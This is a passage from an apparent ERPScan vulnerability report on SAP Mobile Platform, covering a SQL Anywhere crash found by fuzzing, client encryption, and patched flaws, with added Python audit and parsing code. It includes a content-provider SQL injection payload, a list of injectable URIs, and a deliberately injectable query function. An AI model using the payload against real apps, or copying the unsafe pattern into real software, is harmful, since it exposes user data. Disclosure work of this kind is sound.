User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=1tszneqypgst21x9h59bd6pad1
Connection: keep-alive
Content-type: application/x-www-form-urlencoded

value=BASE_64_PACKET

This vulnerability is fixed by SAP Security Note 2227855.
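An added audit helper for the misconfiguration this section describes (our example, not SAP's or ERPScan's code): it parses a web.xml and lists every servlet url-pattern that no security-constraint carrying an auth-constraint covers, i.e. everything reachable without logging in. The descriptor below is constructed for the example and is not SMP's real web.xml; the url-pattern matching is a simplified form of the servlet-spec rules.

```python
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip the XML namespace: '{ns}url-pattern' -> 'url-pattern'."""
    return tag.rsplit("}", 1)[-1]


def _texts(elem, name: str) -> list:
    """Non-empty text of every descendant element called `name`."""
    return [e.text.strip() for e in elem.iter() if _local(e.tag) == name and e.text]


def _covers(constraint_pattern: str, mapping_pattern: str) -> bool:
    """Does a security-constraint url-pattern cover a servlet-mapping url-pattern?

    Simplified servlet-spec matching: exact match, '/*' covers everything, and
    '/prefix/*' covers '/prefix', '/prefix/*' and '/prefix/anything'.
    """
    if constraint_pattern == mapping_pattern or constraint_pattern == "/*":
        return True
    if constraint_pattern.endswith("/*"):
        prefix = constraint_pattern[:-2]
        return mapping_pattern == prefix or mapping_pattern.startswith(prefix + "/")
    return False


def unprotected_servlet_patterns(web_xml: str) -> list:
    """Servlet url-patterns that no <security-constraint> with an
    <auth-constraint> protects, i.e. servlets reachable anonymously."""
    root = ET.fromstring(web_xml)
    mapped, protected = [], []
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "servlet-mapping":
            mapped.extend(_texts(el, "url-pattern"))
        elif tag == "security-constraint":
            # A constraint without <auth-constraint> only sets transport rules
            # (e.g. CONFIDENTIAL); it does not require any login.
            if any(_local(c.tag) == "auth-constraint" for c in el):
                protected.extend(_texts(el, "url-pattern"))
    return [m for m in mapped if not any(_covers(p, m) for p in protected)]


# Constructed sample descriptor (servlet definitions omitted): the admin tool
# servlets are mapped, but only /console/* is placed behind a role requirement.
SAMPLE_WEB_XML = """
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet-mapping>
    <servlet-name>jarpkg</servlet-name>
    <url-pattern>/sysadminwebtool/jarpkg</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>pull</servlet-name>
    <url-pattern>/sysadminwebtool/pull</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>console</servlet-name>
    <url-pattern>/console/*</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>console</web-resource-name>
      <url-pattern>/console/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>admin</role-name></auth-constraint>
  </security-constraint>
</web-app>
"""

if __name__ == "__main__":
    for pattern in unprotected_servlet_patterns(SAMPLE_WEB_XML):
        print("anonymous access:", pattern)
```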

4. SAP Sybase SQL Anywhere

The SAP Mobile Platform 2.3 database is SAP Sybase SQL Anywhere, or just SQL Anywhere, version 16. The database was renamed SQL Anywhere in 2006, when version 10 was released. Today, version 10 or higher is used everywhere.

If you look at the statistics of security issues found in Sybase products at http://www.cvedetails.com/product-list/vendor_id-430/Sybase.html, you can see that the only vulnerability found in SQL Anywhere dates back to 2008 and is a buffer overflow. We decided to find out what the vulnerability was.

The vulnerability has the code CVE-2008-0912. It was discovered by a researcher named Luigi Auriemma. Here is Luigi's description of the vulnerability:

“The Mobilink server is affected by a heap overflow which happens during the handling of some strings like username, version and remote ID (all pre-auth) when have a length major than 128 bytes.”

The full description of CVE-2008-0912 is available here.

Encouraged by this vulnerability, we decided to begin our study of the product. We downloaded and installed two versions of SQL Anywhere: 11 and 16.

After installation, we are prompted to start the SQL server, which listens on a local port and accepts connections from other hosts. In the developer's edition, a demo database is provided together with the DBMS; it is located at C:\%User%\Public\Documents\SQL Anywhere%version%\Samples\demo.db. The default username and password are dba:sql. Once the server is started, the process dbsrv%version%.exe runs and listens on port 2638, 3638, or 5200.

Sybase Central, which is installed together with the database, is used to connect to it. Run Sybase Central and connect to a running database that resides on the server 172.16.30.6 and listens on port 5200.

Figure 12

Run Wireshark in parallel on the host.

Figure 13

After the client (172.16.2.67) successfully connected to the server (172.16.30.6), we stopped Wireshark and analyzed the requests. We are interested in the first PSH request (number 1699).

Figure 14

The data is obviously transferred via the TDS protocol.

00000090  1b 00 00 50 00 00 00 00 12 43 4f 4e 4e 45 43 54  ...P.....CONNECT
000000a0  49 4f 4e 4c 45 53 53 5f 54 44 53 00 00 00 01 00  IONLESS_TDS.....
000000b0  00 04 00 05 00 06 00 00 01 02 00 00 03 01 01 04  ................
000000c0  08 00 00 00 00 00 00 00 00 07 02 04 b1 08 11 6d  ...............m
000000d0  6f 62 69 6c 61 32 33 5f 70 72 69 6d 61 72 79 00  obila23_primary.

We have analyzed the transmitted protocol. The first 8 bytes indicate that we are using SQL Anywhere 16.

Figure 15

The following 19 bytes mean that we are using the TDS protocol.

Figure 16

We still did not know what the remaining data meant, but we understood one thing: the login and password are sent in the following query. Later, we will try to understand where and how they are transmitted.

Figure 17

The last 18 bytes indicate the name of the SQL server to which the connection will be created.
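To make the field layout described above concrete, here is an added Python parser (our example, not ERPScan's tooling or SAP's code) that splits the captured connect preamble into the three fields identified in the text: the 8-byte SQL Anywhere 16 marker, the length-prefixed protocol name, and the trailing length-prefixed, NUL-terminated server name. The packet bytes are transcribed from the hex dump above; the bytes in between are returned undecoded, since the text does not decode them.

```python
# Transcribed from the hex dump of the first PSH packet above (client -> server
# on TCP port 5200). bytes.fromhex() ignores the spaces between byte pairs.
CONNECT_PACKET = bytes.fromhex(
    "1b 00 00 50 00 00 00 00 12 43 4f 4e 4e 45 43 54"  # ...P.....CONNECT
    "49 4f 4e 4c 45 53 53 5f 54 44 53 00 00 00 01 00"  # IONLESS_TDS.....
    "00 04 00 05 00 06 00 00 01 02 00 00 03 01 01 04"  # ................
    "08 00 00 00 00 00 00 00 00 07 02 04 b1 08 11 6d"  # ...............m
    "6f 62 69 6c 61 32 33 5f 70 72 69 6d 61 72 79 00"  # obila23_primary.
)

# First 8 bytes of this capture; the text identifies them as the SQL Anywhere 16 marker.
SQLANYWHERE16_MARKER = CONNECT_PACKET[:8]


def parse_connect(payload: bytes) -> dict:
    """Split a connect preamble into the fields identified in the text.

    Observed layout (one capture, not a full protocol specification):
      payload[0:8]    fixed marker (SQL Anywhere 16 here)
      payload[8]      N, followed by N ASCII bytes of protocol name
      ...             option bytes, returned undecoded
      last 18 bytes   length byte (counts the NUL), server name, NUL
    """
    if len(payload) < 10 or payload[-1] != 0:
        raise ValueError("not a connect preamble: too short or name not NUL-terminated")
    n = payload[8]
    proto = payload[9:9 + n]
    if len(proto) != n or not proto.isascii():
        raise ValueError("malformed protocol name field")
    # Walk back over the printable server name; its length byte sits just before it.
    end = len(payload) - 1            # index of the terminating NUL
    start = end
    while start > 9 + n and 0x20 <= payload[start - 1] < 0x7F:
        start -= 1
    declared = payload[start - 1]
    if declared != end - start + 1:   # name bytes plus the NUL
        raise ValueError("server name length byte %d does not match %d"
                         % (declared, end - start + 1))
    return {
        "marker": payload[:8],
        "protocol": proto.decode("ascii"),
        "options": payload[9 + n:start - 1],
        "server_name": payload[start:end].decode("ascii"),
    }


def is_sqlanywhere_tds_connect(payload: bytes) -> bool:
    """Cheap classifier for a network sensor watching ports 2638/3638/5200:
    True when the payload carries the SA16 marker and the TDS protocol name."""
    try:
        fields = parse_connect(payload)
    except ValueError:
        return False
    return (fields["marker"] == SQLANYWHERE16_MARKER
            and fields["protocol"] == "CONNECTIONLESS_TDS")


if __name__ == "__main__":
    f = parse_connect(CONNECT_PACKET)
    print(f["protocol"], "->", f["server_name"], "(%d option bytes)" % len(f["options"]))
```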

Figure 18

In the response, we obtain:

Figure 19

– which tells us the connection is established.

First, we tried to decompile the files that are used to interconnect the client and the server, but that would take a lot of time, so we used a shorter way: fuzzing. We took the first request to connect to the database (1699). After 1 minute of fuzzing our database, SQL Anywhere 16 crashed. After analyzing all the requests that were sent to the server, we found out that the database was down. Here is the query (PoC):

Figure 20

Send this PoC to the 5200 and 5500 ports:

Figure 21

– and look at the service manager:

Figure 22

The database services were turned off. The logs gave us the error and the stack dump of SQL Anywhere.

Figure 23

This vulnerability is fixed by the SAP Security Note 2108161.

5. SAP MOBILE APPLICATIONS

During our security analysis of SAP mobile applications, we found some very interesting details.

We only analyzed Android-based mobile applications. Google Play Market has about 46 applications for SAP developed by SAP SE: https://play.google.com/store/apps/developer?id=SAP+SE. Unfortunately, we did not have time to analyze all of them.

5.1. 4 interesting facts about SAP applications for Android

1. Android applications use shared code. When writing different programs, developers often use the same library or identical code parts. This certainly has an advantage because it saves development time, but if one application has a vulnerability, it is highly likely that the same vulnerability will be present in other applications.

2. Due to human error, sensitive data is often stored in plain text in the folder /data/data/APP_NAME/shared_prefs. This, in our opinion, happens because idle programmers find it easier to write and read information from a file rather than from the database. The applications that we examined do not store user data in this folder.

3. KeyStore. We have not yet fully analyzed how KeyStore works in SAP programs for Android, but it’s pretty amazing. In the new versions of applications, there is protection against unauthorized access. Before a program works, the Android application asks for a password to access the main functions of the program. All data stored in KeyStore is encrypted using this key. There is another encryption feature that we still haven’t completely understood: the data encryption key. To some extent, it depends on the data entered by the user.

Figure 24

4. Database. Databases in SAP applications store all critical data. And all data is encrypted with a key that the user enters. The encryption algorithm is AES or RSA.

5. Let's look at the application Hybrid Web Container for Android. The SMP Messaging protocol was already mentioned above. During initialization, the application (Hybrid Web Container at 172.16.2.17) sends connection requests to the server (172.16.30.6) that look like this:

Figure 25

Show Follow TCP Stream in Wireshark:

Figure 26

As you can see, it's an HTTP POST request, and the body is binary data. First, the binary data is compressed with the gzip algorithm, then encrypted and sent to the server. supAdmin here is the user of the application on the server. Connection string:

xtm://mo/rmi?cid=HWC&devid=4659daa3-c047-37bd-9a24-a5e579788e09__HWC&devtype=android&connid=2&valcode=555555&noauth=true

– where HWC is the Farm ID, 555555 is the activation code, and devid is a code generated automatically on the smartphone. All of this data is initialized in the application. The connection can also be made over the HTTPS protocol.

Figure 27

Let’s see how the POST body is encrypted.

The encryption key is selected by the following algorithm.

1. The app looks in its local database for any keys that can encrypt data. The keys are stored in the database ServerKeysDB, which is located at /data/data/com.sybase.hwc/databases/.

1.1. If the keys are there, the data is encrypted with this key and sent to the server.

1.2. If the key is not in the local database, go to step 2.

package com.sybase.messaging.traveler;
************
private OutputStream startTmMessage(...)
    throws TmException
{
    ************
    RSAPublicKey localRSAPublicKey = this.m_oServerKeys.m_oServerPublicKey;
    i = 0; if (localRSAPublicKey != null) break label732; getKeysFromServer();
    ************
}

2. The application sends a request to the server to provide encryption keys.

2.1. If the server responds positively and sends the keys to the client, the application imports the key into the local database (ServerKeysDB), and the data is encrypted with this key and sent to the server.

2.2. If the server responds negatively, go to step 3.

3. The Android application generates its own keys, stores them in the local database, encrypts the message with them, and sends the data to the server.

********

arrayOfByte1 = Cryptographer.generateNewSymmetricKey();

arrayOfByte2 = Cryptographer.generateNewSymmetricKey();

********

5.2. SAP EMR Unwired SQL injection

An ERPScan researcher discovered an SQL injection vulnerability in the SAP EMR Unwired application (com.sap.mobi). Malware can execute SQL queries in the SAP EMR Unwired database.

In order to carry out the attack, malicious applications must have the following rights in AndroidManifest.xml:

<provider android:name=".providers.ModiDataDbProvider" android:authorities="com.sap.mobi.docsprovider" />

Injection in Projection:

content://com.sap.mobi.docsprovider/documents/offline_cat

content://com.sap.mobi.docsprovider/documents/offline/

content://com.sap.mobi.docsprovider/documents/sample

content://com.sap.mobi.docsprovider/documents/online

content://com.sap.mobi.docsprovider/documents/offline_auth

content://com.sap.mobi.docsprovider/documents/offline

content://com.sap.mobi.docsprovider/documents/online_auth

content://com.sap.mobi.docsprovider/documents/sample/

content://com.sap.mobi.docsprovider/documents/online_cat

Injection in Selection:

content://com.sap.mobi.docsprovider/documents/offline_cat

content://com.sap.mobi.docsprovider/documents/offline/

content://com.sap.mobi.docsprovider/documents/sample

content://com.sap.mobi.docsprovider/documents/online

content://com.sap.mobi.docsprovider/documents/offline_auth

content://com.sap.mobi.docsprovider/documents/offline

content://com.sap.mobi.docsprovider/documents/online_auth

content://com.sap.mobi.docsprovider/documents/sample/

content://com.sap.mobi.docsprovider/documents/online_cat

PoC:

Uri: content://com.sap.mobi.docsprovider/documents/sample

Projection: = name from sqlite_master --

This vulnerability is patched by SAP Note 1864518.

More details here: http://erpscan.com/advisories/erpscan-13-024-sap-emr-unwired-multiple-sql-injections/
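The PoC above works because the caller-supplied projection is pasted straight into the SELECT list. As an added example (not the app's Java code, and not ERPScan's or SAP's), the following Python models that content-provider query pattern against an in-memory SQLite table, with the injectable version beside a hardened one that validates the projection against a projection map and restricts the selection to columns, operators and ? placeholders, so values travel only through selectionArgs. The table schema and rows are constructed for the example.

```python
import re
import sqlite3

# Constructed stand-in for the provider's backing table (not the real SAP EMR schema).
_SCHEMA = """
CREATE TABLE documents (_id INTEGER PRIMARY KEY, name TEXT, owner TEXT, content TEXT);
INSERT INTO documents (name, owner, content) VALUES ('report.pdf', 'alice', 'q1 figures');
INSERT INTO documents (name, owner, content) VALUES ('notes.txt', 'bob', 'private');
"""
# Columns a caller may name in a projection (a projection map).
ALLOWED_COLUMNS = {"_id", "name", "owner"}
_KEYWORDS = {"AND", "OR", "NOT", "IS", "NULL", "LIKE", "IN"}
_TOKEN = re.compile(r"\s*([A-Za-z_]\w*|\?|<=|>=|<>|!=|[=<>()])\s*")


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(_SCHEMA)
    return db


def query_unsafe(db, projection, selection=None, selection_args=()):
    """The injectable pattern: projection and selection are pasted verbatim into
    the SQL text, so a projection of 'name from sqlite_master --' rewrites the query."""
    sql = "SELECT %s FROM documents" % ", ".join(projection)
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql, selection_args).fetchall()


def _check_selection(selection, selection_args):
    """Accept only column names, comparison operators, boolean keywords,
    parentheses and '?' placeholders; quotes, literals, comments, semicolons
    and subqueries are rejected before any SQL is built."""
    pos = 0
    for m in _TOKEN.finditer(selection):
        if m.start() != pos:
            break                      # unrecognised characters were skipped
        tok = m.group(1)
        pos = m.end()
        if tok.isidentifier() and tok.upper() not in _KEYWORDS and tok not in ALLOWED_COLUMNS:
            raise ValueError("illegal identifier in selection: %r" % tok)
    if pos != len(selection):
        raise ValueError("unexpected token in selection at offset %d" % pos)
    if selection.count("?") != len(selection_args):
        raise ValueError("placeholder count does not match selectionArgs")


def query_hardened(db, projection, selection=None, selection_args=()):
    """Same interface as query_unsafe, but the projection must consist of known
    columns and the selection must fit the grammar enforced by _check_selection."""
    for col in projection:
        if col not in ALLOWED_COLUMNS:
            raise ValueError("illegal column in projection: %r" % col)
    if selection:
        _check_selection(selection, selection_args)
    sql = "SELECT %s FROM documents" % ", ".join(projection)
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql, selection_args).fetchall()


def is_rejected(fn, *args):
    """True if fn(*args) raises ValueError (demonstrates the hardened path)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```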

CONCLUSION

Beyond doubt, new features simplify business processes and improve performance. However, when implementing a new cutting-edge solution, one should not forget that it may be another entry point for hackers.

The general rule is rather predictable: install appropriate security patches on a regular basis.

ABOUT ERPSCAN

ERPScan is the most respected and credible Business Application Security provider. Founded in 2010, the company operates globally. Named an 'Emerging vendor' in Security by CRN and distinguished by more than 35 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf, supporting it in improving the security of its latest solutions.

ERPScan's primary mission is to close the gap between technical and business security, and to provide solutions to evaluate and secure ERP systems and business-critical applications from both cyber-attacks and internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.

Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi-award-winning innovative software is the only solution in the market certified by SAP SE that covers all tiers of SAP security, i.e. vulnerability assessment, source code review and Segregation of Duties. The largest companies from diverse industries such as oil and gas, banking, retail, even nuclear power installations, as well as consulting companies, have successfully deployed the software. ERPScan Monitoring Suite for SAP is specifically designed for enterprise systems to continuously monitor changes in multiple SAP systems. It generates and analyzes trends on user-friendly dashboards, manages risks and tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.

We use the 'follow the sun' principle and operate from two hubs, located in the Netherlands and the US, running local offices and a partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time while providing agile customer support.

ABOUT ERPSCAN RESEARCH TEAM

The company's expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has received multiple acknowledgments from the largest software vendors, such as SAP, Oracle, Microsoft, IBM, VMware and HP, for exposing in excess of 400 vulnerabilities in their solutions (200 of them in SAP alone!).

ERPScan researchers are proud to have exposed new types of vulnerabilities (Top 10 Web Hacking Techniques 2012) and were nominated for best server-side vulnerability at BlackHat 2013.

ERPScan experts have been invited to speak, present and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB as well as private trainings for SAP in several Fortune 2000 companies.

ERPScan researchers lead the EAS-SEC project, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and specialized infosec publications worldwide, including Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise and Chinabyte, to name a few.

We have highly qualified experts on staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, and we pool their experience to conduct research in SAP system security.

OUR CONTACTS

US Office:

Mail to: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

EMEA Headquarters

Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam

Phone: +31 20 8932892

Twitter: @erpscan

Web: www.erpscan.com

Contact: [email protected]

PR: [email protected]

Products

• ERPScan Security Monitoring Suite for SAP

• ERPScan Security Scanner for SAP

• ERPScan Security Monitoring Suite for Oracle PeopleSoft

• SAP Code Security as a Service

Services

• SAP Vulnerability Assessment

• SAP Security Audit

• SAP Security Trainings

• ABAP code security review

• SAP Penetration testing